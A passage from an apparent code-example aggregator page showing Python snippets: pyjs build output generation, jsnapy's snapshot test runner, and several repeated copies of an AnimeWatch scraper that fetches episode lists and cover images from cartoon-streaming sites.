                    code.append("/* start %s: %s */" % (msg, name))
                f = file(fname)
                code.append(f.read())
                if not msg is None:
                    code.append("/* end %s */" % (name,))
                code.append("""--></script>""")
                self.remove_files[fname] = True
                fname = fname.split('.')
                if fname[-2] == '__%s__' % platform_name:
                    del fname[-2]
                    fname = '.'.join(fname)
                    if os.path.isfile(fname):
                        self.remove_files[fname] = True
            return "\n".join(code)

        def js_modname(path):
            return '[email protected]'+os.path.basename(path)+'.'+md5(path).hexdigest()

        def skip_unlinked(lst):
            new_lst = []
            pltfrm = '__%s__' % platform_name
            for path in lst:
                fname = os.path.basename(path).rpartition(pyjs.MOD_SUFFIX)[0]
                frags = fname.split('.')
                # TODO: do not combine module chunks until we write the file
                if self.cache_buster and len(frags[-1])==32 and len(frags[-1].strip('0123456789abcdef'))==0:
                    frags.pop()
                if frags[-1] == pltfrm:
                    frags.pop()
                fname = '.'.join(frags)
                in_not_unlinked_modules = False
                for m in not_unlinked_modules:
                    if m.match(fname):
                        in_not_unlinked_modules = True
                        new_lst.append(path)
                        break
                if not in_not_unlinked_modules:
                    in_unlinked_modules = False
                    for m in unlinked_modules:
                        if m.match(fname):
                            in_unlinked_modules = True
                            if fname in available_modules:
                                available_modules.remove(fname)
                    if not in_unlinked_modules:
                        new_lst.append(path)
            return new_lst

        if self.multi_file:
            dynamic_js_libs = self.unique_list_values(dynamic_js_libs + [m for m in list(self.js_libs) if not m in static_js_libs])
            dynamic_app_libs = self.unique_list_values([m for m in done if not m in early_static_app_libs])
        else:
            static_js_libs = self.unique_list_values(static_js_libs + [m for m in list(self.js_libs) if not m in dynamic_js_libs])
            static_app_libs = self.unique_list_values([m for m in done if not m in early_static_app_libs])

        dynamic_js_libs = skip_unlinked(dynamic_js_libs)
        dynamic_app_libs = skip_unlinked(dynamic_app_libs)
        static_js_libs = skip_unlinked(static_js_libs)
        static_app_libs = skip_unlinked(static_app_libs)

        dynamic_modules = self.unique_list_values(available_modules + [js_modname(lib) for lib in dynamic_js_libs])
        available_modules = self.unique_list_values(available_modules + early_static_app_libs + dynamic_modules)
        if len(dynamic_modules) > 0:
            dynamic_modules = "['" + "','".join(dynamic_modules) + "']"
        else:
            dynamic_modules = "[]"
        appscript = "<script><!--\n$wnd['__pygwt_modController']['init']($pyjs['appname'], window)\n$wnd['__pygwt_modController']['load']($pyjs['appname'], [\n'%s'\n])\n--></script>"
        jsscript = """<script type="text/javascript" src="%(path)s" onload="$pyjs['script_onload']('%(modname)s')" onreadystatechange="$pyjs['script_onreadystate']('%(modname)s')"></script>"""
        dynamic_app_libs = appscript % "',\n'".join([lib[len_ouput_dir:].replace('\\', '/') for lib in dynamic_app_libs])
        dynamic_js_libs = '\n'.join([jsscript % {'path': lib, 'modname': js_modname(lib)} for lib in dynamic_js_libs])
        early_static_app_libs = static_code(early_static_app_libs)
        static_app_libs = static_code(static_app_libs)
        early_static_js_libs = static_code(early_static_js_libs, "javascript lib")
        static_js_libs = static_code(static_js_libs, "javascript lib")
        late_static_js_libs = static_code(late_static_js_libs, "javascript lib")

        setoptions = "\n".join([("$pyjs['options']['%s'] = %s;" % (n, v)).lower() for n,v in self.runtime_options])

        file_contents = template % locals()
        if self.cache_buster:
            md5sum = md5(file_contents).hexdigest()
            name_parts.insert(2, md5sum)
        out_path = os.path.join(self.output, '.'.join((name_parts)))

        out_file = file(out_path, 'w')
        out_file.write(file_contents)
        out_file.close()
        return out_path

Example 13

Project: jsnapy
Source File: check.py
View license
    def generate_test_files(
            self, main_file, device, check, diff, db, snap_del, pre=None, action=None, post=None):
        """
        generate names of snap files from hostname and out files given by user,
        tests are performed on values stored in these snap files, in which test is
        to be performed
        :param main_file: main config file, to extract test files user wants to run
        :param device: device name
        :param check: variable to check if --check option is given or not
        :param diff: variable to check if --diff option is given or not
        :param db: database object
        :param snap_del: if --snapcheck operator is used without any test file name
                        it will create temprory file and then will delete it at the end
        :param pre: file name of pre snapshot
        :param post: file name of post snapshot
        :param action: given by module version, either snap, snapcheck or check
        :return: object of operator.Operator containing test details
        """
        op = Operator()
        op.device = device
        tests_files = []
        self.log_detail['hostname'] = device
        # get the test files from config.yml
        if main_file.get('tests') is None:
            self.logger_check.error(
                colorama.Fore.RED +
                "\nERROR!! No test file found, Please mention test files !!", extra=self.log_detail)
        else:
            # extract test files, first search in path given in jsnapy.cfg
            for tfile in main_file.get('tests'):
                if not os.path.isfile(tfile):
                    tfile = os.path.join(
                        get_path(
                            'DEFAULT',
                            'test_file_path'),
                        tfile)
                if os.path.isfile(tfile):
                    test_file = open(tfile, 'r')
                    tests_files.append(yaml.load(test_file))
                else:
                    self.logger_check.error(
                        colorama.Fore.RED +
                        "ERROR!! File %s not found for testing" %
                        tfile,
                        extra=self.log_detail)

            # check what all test cases need to be included, if nothing given
            # then include all test cases ####
            for tests in tests_files:
                tests_included = []
                if 'tests_include' in tests:
                    tests_included = tests.get('tests_include')
                else:
                    for t in tests:
                        tests_included.append(t)
                message= self._print_testmssg("Device: "+device, "*")
                self.logger_check.info(colorama.Fore.BLUE + message, extra=self.log_detail)
                for val in tests_included:
                    self.logger_check.info(
                        "Tests Included: %s " %
                        (val),
                        extra=self.log_detail)
                    try:
                        if tests[val][0].keys()[0] == 'command':
                            command = tests[val][0].get('command').split('|')[0].strip()
                            reply_format = tests[val][0].get('format', 'xml')
                            message = self._print_testmssg("Command: "+command, "*")
                        
                            self.logger_check.info(
                                colorama.Fore.BLUE +
                                message,
                                extra=self.log_detail)
                        
                            name = '_'.join(command.split())
                            teston = command
                        else:
                            rpc = tests[val][0]['rpc']
                            reply_format = tests[val][0].get('format', 'xml')
                            self.logger_check.info(colorama.Fore.BLUE + (25) * "*" + "RPC is " +
                                                   rpc + (25) * '*', extra=self.log_detail)
                            name = rpc
                            teston = rpc
                    except KeyError:
                        self.logger_check.error(
                            colorama.Fore.RED +
                            "ERROR occurred, test keys 'command' or 'rpc' not defined properly", extra=self.log_detail)
                    except Exception as ex:
                        self.logger_check.error(
                            colorama.Fore.RED +
                            "ERROR Occurred: %s" % str(ex), extra=self.log_detail)
                    else:
                        # extract snap files, if check from sqlite is true t
                        if db.get(
                                'check_from_sqlite') is True and (check is True or diff is True or action in ["check", "diff"]):
                            a = SqliteExtractXml(db.get('db_name'))
                            # while checking from database, preference is given
                            # to id and then snap name
                            if (db['first_snap_id'] is not None) and (
                                    db['second_snap_id'] is not None):
                                snapfile1, data_format1 = a.get_xml_using_snap_id(
                                    str(device), name, db['first_snap_id'])
                                snapfile2, data_format2 = a.get_xml_using_snap_id(
                                    str(device), name, db['second_snap_id'])
                            else:
                                snapfile1, data_format1 = a.get_xml_using_snapname(
                                    str(device), name, pre)
                                snapfile2, data_format2 = a.get_xml_using_snapname(
                                    str(device), name, post)
                            if reply_format != data_format1 or reply_format != data_format2:
                                self.logger_check.error(colorama.Fore.RED + "ERROR!! Data stored in database is not in %s format."
                                                        % reply_format, extra=self.log_detail)
                                pass
                                # sys.exit(1)
                        ###### taking snapshot for --snapcheck operation ####
                        elif db.get('check_from_sqlite') is True:
                            a = SqliteExtractXml(db.get('db_name'))
                            snapfile1, data_format1 = a.get_xml_using_snapname(
                                str(device), name, pre)
                            if reply_format != data_format1:
                                self.logger_check.error(
                                    colorama.Fore.RED +
                                    "ERROR!! Data stored in database is not in %s format." %
                                    reply_format,
                                    extra=self.log_detail)
                                pass
                                # sys.exit(1)
                        else:
                            snapfile1 = self.generate_snap_file(
                                device,
                                pre,
                                name,
                                reply_format)

                        # if check is true then call function to compare two
                        # snapshots ####
                        if (check is True or action is "check") and reply_format == 'xml':
                            if db.get('check_from_sqlite') is False:
                                snapfile2 = self.generate_snap_file(
                                    device,
                                    post,
                                    name,
                                    reply_format)
                            self.compare_reply(
                                op,
                                tests[val],
                                val,
                                teston,
                                check,
                                db,
                                snapfile1,
                                snapfile2,
                                action)

                        # if --diff is true then call compare_diff to compare
                        # two snapshots word by word ####
                        elif(diff is True):
                            if db.get('check_from_sqlite') is False:
                                snapfile2 = self.generate_snap_file(
                                    device,
                                    post,
                                    name,
                                    reply_format)
                            self.compare_diff(
                                snapfile1,
                                snapfile2,
                                db.get('check_from_sqlite'))

                        # else call --snapcheck test operation, it works only
                        # for xml reply format   ####
                        elif (reply_format == 'xml'):
                            self.compare_reply(
                                op,
                                tests[val],
                                val,
                                teston,
                                check,
                                db,
                                snapfile1,
                                action)
                            ######## bug here ############
                            # multiple testcases for single command and same device, its deleting that file
                            ####################
                            """
                            if snap_del is True:
                                snapfile1 = snapfile1 if os.path.isfile(snapfile1) else self.generate_snap_file(device, pre, name, reply_format)
                                os.remove(snapfile1)
                                """
                        else:
                            # give error message if snapshot in text format is
                            # used with operations other than --diff  ####
                            self.logger_check.error(
                                colorama.Fore.RED +
                                "ERROR!! for checking snapshots in text format use '--diff' option ", extra=self.log_detail)

            # print final result, if operation is --diff then message gets
            # printed compare_diff function only ####
            if (diff is not True):
                op.final_result(self.log_detail)

        return op

Example 14

Project: AnimeWatch
Source File: DubbedAnime.py
View license
	def getEpnList(self,siteName,name,category):
		if siteName == "Cartoon-World" or siteName == "Cartoon-World-Cartoon" or siteName == "Cartoon-World-Movies":
			base = "http://www.cartoon-world.tv/"
			url = base+ "watch/" + name+"/"
		elif siteName == "Dubcrazy":
			base = "http://www.dubbedanimeonline.pw/"
			url = base+ "view/" + name+"/" 
		elif siteName == "Animetycoon":
			base = "http://www.animetycoon.net/"
			url = base+ "watch/" + name+"/"
		elif siteName == "AniDub":
			base = "http://www.watchcartoononline.com/"
			if category == "Movie":
					url = "http://www.watchcartoononline.com/" + name
			else:
					url = "http://www.watchcartoononline.com/anime/" + name
		elif siteName == "AnimeStatic":
			base = "http://www.animestatic.co/"
			if category == "Movies": 
				url = "http://www.animestatic.co/" + name + '/'
			else:
				url = "http://www.animestatic.co/anime/" + name + '/'
		elif siteName == "CartoonMax":
			url = "http://gogocartoon.us/category/" + name 
			base = "http://gogocartoon.us/"
			
		
		print(url)
		#if base_url == 0:
		#content = subprocess.check_output(['curl','-A',hdr,url]) 
		#else:
		#	content = ccurl(url,"no_redir")
		if siteName == "Cartoon-World" or siteName == "Cartoon-World-Cartoon" or siteName == "Cartoon-World-Movies":
			#content = (subprocess.check_output(['curl','-A',self.hdr,url]))
			#content = self.getContent(content)
			content = ccurlNew(url+'#'+'-L')
		else:
			"""
			hdrs = {'user-agent':self.hdr}
			req = requests.get(url,headers=hdrs)
			summary = ""
			content = req.text
			"""
			#content = (subprocess.check_output(['curl','-A',self.hdr,url]))
			#content = self.getContent(content)
			content = content = ccurlNew(url+'#'+'-L')
		soup = BeautifulSoup(content,'lxml')
		if siteName == "Cartoon-World" or siteName == "Cartoon-World-Cartoon" or siteName == "Cartoon-World-Movies":
	
				link1 = soup.findAll('div',{'class':'ani-row'})
				print(link1)
				try:
					img1 = link1[0].find('img',{'class':'anime'})
					print(img1)
					img = img1['src']
					if not "http://" in img:
						img2 = re.findall('/images/[^"]*',img)
						img = "http://www.cartoon-world.tv"+img2[0]
						print(img)
					
					picn = "/tmp/AnimeWatch/"+name+'.jpg'
					if not os.path.isfile(picn) and img:
						#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img])
						ccurlNew(img+'#'+'-o'+'#'+picn)
				except:
					picn = "No.jpg"
					img = ""
				try:
					summary=str(link1[1])
				
					summary = re.sub('</table>','</table><div class="desc">',summary)
					summary = re.sub('</div>','</div></div>',summary)
					print(summary)
					soup = BeautifulSoup(summary)

					info = soup.findAll('td',{'class':'ani-table-ans'})

					summary = info[0].text+'\nType: '+ info[1].text+ '\nAired: ' + info[2].text + '\nGenre: ' + info[3].text+soup.find('div',{'class':'desc'}).text 
				except:
					summary = "No Summary Available"
				
		
		elif siteName == "AniDub" or siteName == "AnimeStatic":
			m = []
			if category == "Movies":
				m.append(name)
			else:
				if siteName == "AniDub":
					link = soup.findAll('div',{'class':'menustyle'})
				else:
					link = soup.findAll('ul',{ 'class':'eps eps-list'})
				for i in link:
					a = i.findAll('a')
					for j in a:
							k=(j['href']).split('/')
							if siteName == "AniDub":
								m.append(k[-1])
							else:
								m.append(k[-2])
		
			if siteName == "AniDub":
				img = []
				link = soup.findAll('div',{'class':'katcont'})		 	
				for i in link:
					summary = re.sub('\n','',i.text)
				img = re.findall('http[^"]*.jpg',content)
				
			elif siteName == "AnimeStatic":
				link = soup.find("div",{ "class":"deskripsi"})
				summary = ""
				img = []
				if link:
					
					sumr= link.find('p')
					summary = sumr.text
					#summary = re.sub('Genres[^\n]*\n','Genres : ',summary)
					#summary = re.sub('Title[^\n]*\n','Title : ',summary)
					#summary = re.sub('Rating[^\n]*\n','Rating : ',summary)
					#summary = re.sub('[)]','',summary)
					#summary = re.sub('[,][^"]\n','\n',summary)
				link = soup.find('div',{'class':'imganime'})
				if link:
					img1 = link.find('img')
					if img1:
						img.append(img1['src'])
					
			picn = "/tmp/AnimeWatch/" + name + ".jpg"
			if not os.path.isfile(picn) and img:
				#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img[0]])
				ccurlNew(img[0]+'#'+'-o'+'#'+picn)
		elif siteName == "Animetycoon":
			img =[]
			#text = str(text)
			#print(text
			try:
				text = soup.find('article')
				text1 = text.find('p')
				summary = text1.text
				try:
					img1 = text.find('img')['src']
					if 'http' not in img1:
						img1 = 'http:' + img1
					img.append(img1)
				except:
					img = re.findall('//[^"]*posters/[^"]*.jpg',content)
					img[0] = "http:" + img[0]
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				if not os.path.isfile(picn):
					#subprocess.call(["curl","-L","-o",picn,img[0]])
					ccurlNew(img[0]+'#'+'-o'+'#'+picn)
				
			except: 
				summary = "No Summary Available"
				picn = "No"
		elif siteName == "CartoonMax":
				m = []
				link = soup.find('div',{'class':'list-chapter mCustomScrollbar'})
				if link:
					j = link.findAll('a')
					for k in j:
						tmp = k['href'].split('/')[-1]
						m.append(tmp)
					
				else:
					link = soup.find('div',{'class':'anime_info_episodes'})
				
					link1 = link.findAll('a')
					for i in link1:
						k = i['href'].split('/')[-1]
						m.append(k)
				summary = ""
				link = soup.find('div',{ 'class':'description'})
				img = []
				summary = link.text
					
				link = soup.find('div',{ 'class':'box-content'})
				img1_src = link.find('div',{ 'class':'img'})
				img_src = link.find('img')['src'] 
				if ' ' in img_src:
					img_src = re.sub(" ","%20",img_src)
				print(img_src)
				if img_src:
					img.append(img_src)
					
				print(img)
				
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				
				try:
					if not os.path.isfile(picn):
						ccurlNew(img[0]+'#'+'-o'+'#'+picn)
				except:
					pass
		elif siteName == "Dubcrazy":
			
					
			try:
				summary = ""
				link = soup.findAll('div',{'class':'main_container'})
				#print(link
				for i in link:
					j = i.findAll('p')
					for k in j:
						summary = k.text
				
				img = "http://www.dubbedanimeonline.pw/images/" + name+".jpg"
				print(img)
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				if not os.path.isfile(picn):
					#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img])
					ccurlNew(img+'#'+'-o'+'#'+picn)
			except:
				summary = "No Summary Available"
				picn = "No"
			#print(img
		if siteName != "AniDub" and siteName != "CartoonMax": 
			fi = base + name+ '[^"]*/'
			m = re.findall(fi, content)
			j=0
			for i in m:
				i = re.sub(base,"",i)
				m[j] = i[:-1]
				j = j + 1
		m=naturallysorted(m)
		m.append(picn)
		m.append(summary)
		return m

Example 15

Project: AnimeWatch
Source File: DubbedAnime.py
View license
	def getEpnList(self,siteName,name,category):
		if siteName == "Cartoon-World" or siteName == "Cartoon-World-Cartoon" or siteName == "Cartoon-World-Movies":
			base = "http://www.cartoon-world.tv/"
			url = base+ "watch/" + name+"/"
		elif siteName == "Dubcrazy":
			base = "http://www.dubbedanimeonline.pw/"
			url = base+ "view/" + name+"/" 
		elif siteName == "Animetycoon":
			base = "http://www.animetycoon.net/"
			url = base+ "watch/" + name+"/"
		elif siteName == "AniDub":
			base = "http://www.watchcartoononline.com/"
			if category == "Movie":
					url = "http://www.watchcartoononline.com/" + name
			else:
					url = "http://www.watchcartoononline.com/anime/" + name
		elif siteName == "AnimeStatic":
			base = "http://www.animestatic.co/"
			if category == "Movies": 
				url = "http://www.animestatic.co/" + name + '/'
			else:
				url = "http://www.animestatic.co/anime/" + name + '/'
		elif siteName == "CartoonMax":
			url = "http://gogocartoon.us/category/" + name 
			base = "http://gogocartoon.us/"
			
		
		print(url)
		#if base_url == 0:
		#content = subprocess.check_output(['curl','-A',hdr,url]) 
		#else:
		#	content = ccurl(url,"no_redir")
		if siteName == "Cartoon-World" or siteName == "Cartoon-World-Cartoon" or siteName == "Cartoon-World-Movies":
			#content = (subprocess.check_output(['curl','-A',self.hdr,url]))
			#content = self.getContent(content)
			content = ccurlNew(url+'#'+'-L')
		else:
			"""
			hdrs = {'user-agent':self.hdr}
			req = requests.get(url,headers=hdrs)
			summary = ""
			content = req.text
			"""
			#content = (subprocess.check_output(['curl','-A',self.hdr,url]))
			#content = self.getContent(content)
			content = content = ccurlNew(url+'#'+'-L')
		soup = BeautifulSoup(content,'lxml')
		if siteName == "Cartoon-World" or siteName == "Cartoon-World-Cartoon" or siteName == "Cartoon-World-Movies":
	
				link1 = soup.findAll('div',{'class':'ani-row'})
				print(link1)
				try:
					img1 = link1[0].find('img',{'class':'anime'})
					print(img1)
					img = img1['src']
					if not "http://" in img:
						img2 = re.findall('/images/[^"]*',img)
						img = "http://www.cartoon-world.tv"+img2[0]
						print(img)
					
					picn = "/tmp/AnimeWatch/"+name+'.jpg'
					if not os.path.isfile(picn) and img:
						#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img])
						ccurlNew(img+'#'+'-o'+'#'+picn)
				except:
					picn = "No.jpg"
					img = ""
				try:
					summary=str(link1[1])
				
					summary = re.sub('</table>','</table><div class="desc">',summary)
					summary = re.sub('</div>','</div></div>',summary)
					print(summary)
					soup = BeautifulSoup(summary)

					info = soup.findAll('td',{'class':'ani-table-ans'})

					summary = info[0].text+'\nType: '+ info[1].text+ '\nAired: ' + info[2].text + '\nGenre: ' + info[3].text+soup.find('div',{'class':'desc'}).text 
				except:
					summary = "No Summary Available"
				
		
		elif siteName == "AniDub" or siteName == "AnimeStatic":
			m = []
			if category == "Movies":
				m.append(name)
			else:
				if siteName == "AniDub":
					link = soup.findAll('div',{'class':'menustyle'})
				else:
					link = soup.findAll('ul',{ 'class':'eps eps-list'})
				for i in link:
					a = i.findAll('a')
					for j in a:
							k=(j['href']).split('/')
							if siteName == "AniDub":
								m.append(k[-1])
							else:
								m.append(k[-2])
		
			if siteName == "AniDub":
				img = []
				link = soup.findAll('div',{'class':'katcont'})		 	
				for i in link:
					summary = re.sub('\n','',i.text)
				img = re.findall('http[^"]*.jpg',content)
				
			elif siteName == "AnimeStatic":
				link = soup.find("div",{ "class":"deskripsi"})
				summary = ""
				img = []
				if link:
					
					sumr= link.find('p')
					summary = sumr.text
					#summary = re.sub('Genres[^\n]*\n','Genres : ',summary)
					#summary = re.sub('Title[^\n]*\n','Title : ',summary)
					#summary = re.sub('Rating[^\n]*\n','Rating : ',summary)
					#summary = re.sub('[)]','',summary)
					#summary = re.sub('[,][^"]\n','\n',summary)
				link = soup.find('div',{'class':'imganime'})
				if link:
					img1 = link.find('img')
					if img1:
						img.append(img1['src'])
					
			picn = "/tmp/AnimeWatch/" + name + ".jpg"
			if not os.path.isfile(picn) and img:
				#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img[0]])
				ccurlNew(img[0]+'#'+'-o'+'#'+picn)
		elif siteName == "Animetycoon":
			img =[]
			#text = str(text)
			#print(text
			try:
				text = soup.find('article')
				text1 = text.find('p')
				summary = text1.text
				try:
					img1 = text.find('img')['src']
					if 'http' not in img1:
						img1 = 'http:' + img1
					img.append(img1)
				except:
					img = re.findall('//[^"]*posters/[^"]*.jpg',content)
					img[0] = "http:" + img[0]
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				if not os.path.isfile(picn):
					#subprocess.call(["curl","-L","-o",picn,img[0]])
					ccurlNew(img[0]+'#'+'-o'+'#'+picn)
				
			except: 
				summary = "No Summary Available"
				picn = "No"
		elif siteName == "CartoonMax":
				m = []
				link = soup.find('div',{'class':'list-chapter mCustomScrollbar'})
				if link:
					j = link.findAll('a')
					for k in j:
						tmp = k['href'].split('/')[-1]
						m.append(tmp)
					
				else:
					link = soup.find('div',{'class':'anime_info_episodes'})
				
					link1 = link.findAll('a')
					for i in link1:
						k = i['href'].split('/')[-1]
						m.append(k)
				summary = ""
				link = soup.find('div',{ 'class':'description'})
				img = []
				summary = link.text
					
				link = soup.find('div',{ 'class':'box-content'})
				img1_src = link.find('div',{ 'class':'img'})
				img_src = link.find('img')['src'] 
				if ' ' in img_src:
					img_src = re.sub(" ","%20",img_src)
				print(img_src)
				if img_src:
					img.append(img_src)
					
				print(img)
				
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				
				try:
					if not os.path.isfile(picn):
						ccurlNew(img[0]+'#'+'-o'+'#'+picn)
				except:
					pass
		elif siteName == "Dubcrazy":
			
					
			try:
				summary = ""
				link = soup.findAll('div',{'class':'main_container'})
				#print(link
				for i in link:
					j = i.findAll('p')
					for k in j:
						summary = k.text
				
				img = "http://www.dubbedanimeonline.pw/images/" + name+".jpg"
				print(img)
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				if not os.path.isfile(picn):
					#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img])
					ccurlNew(img+'#'+'-o'+'#'+picn)
			except:
				summary = "No Summary Available"
				picn = "No"
			#print(img
		if siteName != "AniDub" and siteName != "CartoonMax": 
			fi = base + name+ '[^"]*/'
			m = re.findall(fi, content)
			j=0
			for i in m:
				i = re.sub(base,"",i)
				m[j] = i[:-1]
				j = j + 1
		m=naturallysorted(m)
		m.append(picn)
		m.append(summary)
		return m

Example 16

Project: AnimeWatch
Source File: DubbedAnime.py
View license
	def getEpnList(self,siteName,name,category):
		if siteName == "Cartoon-World" or siteName == "Cartoon" or siteName == "Movies":
			base = "http://www.cartoon-world.tv/"
			url = base+ "watch/" + name+"/"
		elif siteName == "Dubcrazy":
			base = "http://www.dubbedanimeonline.pw/"
			url = base+ "view/" + name+"/" 
		elif siteName == "Animetycoon":
			base = "http://www.animetycoon.net/"
			url = base+ "watch/" + name+"/"
		elif siteName == "AniDub":
			base = "http://www.watchcartoononline.com/"
			if category == "Movie":
					url = "http://www.watchcartoononline.com/" + name
			else:
					url = "http://www.watchcartoononline.com/anime/" + name
		elif siteName == "AnimeStatic":
			base = "http://www.animestatic.co/"
			if category == "Movies": 
				url = "http://www.animestatic.co/" + name + '/'
			else:
				url = "http://www.animestatic.co/anime/" + name + '/'
		elif siteName == "CartoonMax":
			url = "http://gogocartoon.us/category/" + name 
			base = "http://gogocartoon.us/"
			
		
		print(url)
		#if base_url == 0:
		#content = subprocess.check_output(['curl','-A',hdr,url]) 
		#else:
		#	content = ccurl(url,"no_redir")
		if siteName == "Cartoon-World" or siteName == "Cartoon" or siteName == "Movies":
			#content = (subprocess.check_output(['curl','-A',self.hdr,url]))
			#content = self.getContent(content)
			content = ccurlNew(url+'#'+'-L')
		else:
			"""
			hdrs = {'user-agent':self.hdr}
			req = requests.get(url,headers=hdrs)
			summary = ""
			content = req.text
			"""
			#content = (subprocess.check_output(['curl','-A',self.hdr,url]))
			#content = self.getContent(content)
			content = content = ccurlNew(url+'#'+'-L')
		soup = BeautifulSoup(content)
		if siteName == "Cartoon-World" or siteName == "Cartoon" or siteName == "Movies":
	
				link1 = soup.findAll('div',{'class':'ani-row'})
				print(link1)
				try:
					img1 = link1[0].find('img',{'class':'anime'})
					print(img1)
					img = img1['src']
					if not "http://" in img:
						img2 = re.findall('/images/[^"]*',img)
						img = "http://www.cartoon-world.tv"+img2[0]
						print(img)
					
					picn = "/tmp/AnimeWatch/"+name+'.jpg'
					if not os.path.isfile(picn) and img:
						#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img])
						ccurlNew(img+'#'+'-o'+'#'+picn)
				except:
					picn = "No.jpg"
					img = ""
				try:
					summary=str(link1[1])
				
					summary = re.sub('</table>','</table><div class="desc">',summary)
					summary = re.sub('</div>','</div></div>',summary)
					print(summary)
					soup = BeautifulSoup(summary)

					info = soup.findAll('td',{'class':'ani-table-ans'})

					summary = info[0].text+'\nType: '+ info[1].text+ '\nAired: ' + info[2].text + '\nGenre: ' + info[3].text+soup.find('div',{'class':'desc'}).text 
				except:
					summary = "No Summary Available"
				
		
		elif siteName == "AniDub" or siteName == "AnimeStatic":
			m = []
			if category == "Movies":
				m.append(name)
			else:
				if siteName == "AniDub":
					link = soup.findAll('div',{'class':'menustyle'})
				else:
					link = soup.findAll('ul',{ 'class':'eps eps-list'})
				for i in link:
					a = i.findAll('a')
					for j in a:
							k=(j['href']).split('/')
							if siteName == "AniDub":
								m.append(k[-1])
							else:
								m.append(k[-2])
		
			if siteName == "AniDub":
				img = []
				link = soup.findAll('div',{'class':'katcont'})		 	
				for i in link:
					summary = re.sub('\n','',i.text)
				img = re.findall('http[^"]*.jpg',content)
				
			elif siteName == "AnimeStatic":
				link = soup.find("div",{ "class":"deskripsi"})
				summary = ""
				img = []
				if link:
					
					sumr= link.find('p')
					summary = sumr.text
					#summary = re.sub('Genres[^\n]*\n','Genres : ',summary)
					#summary = re.sub('Title[^\n]*\n','Title : ',summary)
					#summary = re.sub('Rating[^\n]*\n','Rating : ',summary)
					#summary = re.sub('[)]','',summary)
					#summary = re.sub('[,][^"]\n','\n',summary)
				link = soup.find('div',{'class':'imganime'})
				if link:
					img1 = link.find('img')
					if img1:
						img.append(img1['src'])
					
			picn = "/tmp/AnimeWatch/" + name + ".jpg"
			if not os.path.isfile(picn) and img:
				#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img[0]])
				ccurlNew(img[0]+'#'+'-o'+'#'+picn)
		elif siteName == "Animetycoon":
			img =[]
			#text = str(text)
			#print(text
			try:
				text = soup.find('article')
				text1 = text.find('p')
				summary = text1.text
				try:
					img1 = text.find('img')['src']
					if 'http' not in img1:
						img1 = 'http:' + img1
					img.append(img1)
				except:
					img = re.findall('//[^"]*posters/[^"]*.jpg',content)
					img[0] = "http:" + img[0]
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				if not os.path.isfile(picn):
					#subprocess.call(["curl","-L","-o",picn,img[0]])
					ccurlNew(img[0]+'#'+'-o'+'#'+picn)
				
			except: 
				summary = "No Summary Available"
				picn = "No"
		elif siteName == "CartoonMax":
				m = []
				link = soup.find('div',{'class':'list-chapter mCustomScrollbar'})
				if link:
					j = link.findAll('a')
					for k in j:
						tmp = k['href'].split('/')[-1]
						m.append(tmp)
					
				else:
					link = soup.find('div',{'class':'anime_info_episodes'})
				
					link1 = link.findAll('a')
					for i in link1:
						k = i['href'].split('/')[-1]
						m.append(k)
				summary = ""
				link = soup.find('div',{ 'class':'description'})
				img = []
				summary = link.text
					
				link = soup.find('div',{ 'class':'box-content'})
				img1_src = link.find('div',{ 'class':'img'})
				img_src = link.find('img')['src'] 
				if ' ' in img_src:
					img_src = re.sub(" ","%20",img_src)
				print(img_src)
				if img_src:
					img.append(img_src)
					
				print(img)
				
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				
				try:
					if not os.path.isfile(picn):
						ccurlNew(img[0]+'#'+'-o'+'#'+picn)
				except:
					pass
		elif siteName == "Dubcrazy":
			
					
			try:
				summary = ""
				link = soup.findAll('div',{'class':'main_container'})
				#print(link
				for i in link:
					j = i.findAll('p')
					for k in j:
						summary = k.text
				
				img = "http://www.dubbedanimeonline.pw/images/" + name+".jpg"
				print(img)
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				if not os.path.isfile(picn):
					#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img])
					ccurlNew(img+'#'+'-o'+'#'+picn)
			except:
				summary = "No Summary Available"
				picn = "No"
			#print(img
		if siteName != "AniDub" and siteName != "CartoonMax": 
			fi = base + name+ '[^"]*/'
			m = re.findall(fi, content)
			j=0
			for i in m:
				i = re.sub(base,"",i)
				m[j] = i[:-1]
				j = j + 1
		m=naturallysorted(m)
		m.append(picn)
		m.append(summary)
		return m

Example 17

Project: AnimeWatch
Source File: DubbedAnime.py
View license
	def getEpnList(self,siteName,name,category):
		if siteName == "Cartoon-World" or siteName == "Cartoon" or siteName == "Movies":
			base = "http://www.cartoon-world.tv/"
			url = base+ "watch/" + name+"/"
		elif siteName == "Dubcrazy":
			base = "http://www.dubbedanimeonline.pw/"
			url = base+ "view/" + name+"/" 
		elif siteName == "Animetycoon":
			base = "http://www.animetycoon.net/"
			url = base+ "watch/" + name+"/"
		elif siteName == "AniDub":
			base = "http://www.watchcartoononline.com/"
			if category == "Movie":
					url = "http://www.watchcartoononline.com/" + name
			else:
					url = "http://www.watchcartoononline.com/anime/" + name
		elif siteName == "AnimeStatic":
			base = "http://www.animestatic.co/"
			if category == "Movies": 
				url = "http://www.animestatic.co/" + name + '/'
			else:
				url = "http://www.animestatic.co/anime/" + name + '/'
		elif siteName == "CartoonMax":
			url = "http://gogocartoon.us/category/" + name 
			base = "http://gogocartoon.us/"
			
		
		print(url)
		#if base_url == 0:
		#content = subprocess.check_output(['curl','-A',hdr,url]) 
		#else:
		#	content = ccurl(url,"no_redir")
		if siteName == "Cartoon-World" or siteName == "Cartoon" or siteName == "Movies":
			#content = (subprocess.check_output(['curl','-A',self.hdr,url]))
			#content = self.getContent(content)
			content = ccurlNew(url+'#'+'-L')
		else:
			"""
			hdrs = {'user-agent':self.hdr}
			req = requests.get(url,headers=hdrs)
			summary = ""
			content = req.text
			"""
